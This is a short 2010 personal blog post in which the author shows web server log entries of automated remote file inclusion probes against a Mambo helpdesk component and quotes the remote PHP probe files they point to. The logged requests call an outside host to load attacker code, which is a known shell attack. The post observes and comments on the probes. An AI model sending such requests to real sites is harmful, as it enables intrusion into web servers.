Writing about security on your website h ... / 2010-03-04

Koos van den Hout

2010-03-04 Writing about security on your website h ... 10 years ago
Writing about security on your website has this interesting effect in the logs: 
200.93.147.154 - - [04/Mar/2010:09:58:35 +0100] "GET /~koos/newstag.cgi/security/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0"
200.93.147.154 - - [04/Mar/2010:09:58:35 +0100] "GET /~koos/newstag.cgi/security%20%20/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0"
200.93.147.154 - - [04/Mar/2010:09:58:41 +0100] "GET /~koos/newstag.cgi/security%20%20/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0"
The content of heheh.txt is predictable: 
<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>
By pure coincidence there is a file http://zerozon.co.kr/data/eeng/id1.txt with the contents: 
<?php /* ZFxID */ echo("Shiro"."Hige"); die("Shiro"."Hige"); /* ZFxID */ ?>
And that all looks very familiar: Fx29Shell php attack. This won't keep me from writing about security or amusing myself by browsing the logfiles. Maybe I'll find a fresh attack. This automated one is getting really boring.
Tags: , ,
, reachable as koos+website@idefix.net. PGP encrypted e-mail preferred.

PGP key 5BA9 368B E6F3 34E4 local copy PGP key 5BA9 368B E6F3 34E4 via keyservers pgp key statistics for 0x5BA9368BE6F334E4 Koos van den Hout
RSS
Other webprojects: Camp Wireless, wireless Internet access at campsites, The Virtual Bookcase, book reviews
This page generated in 0.004243 seconds.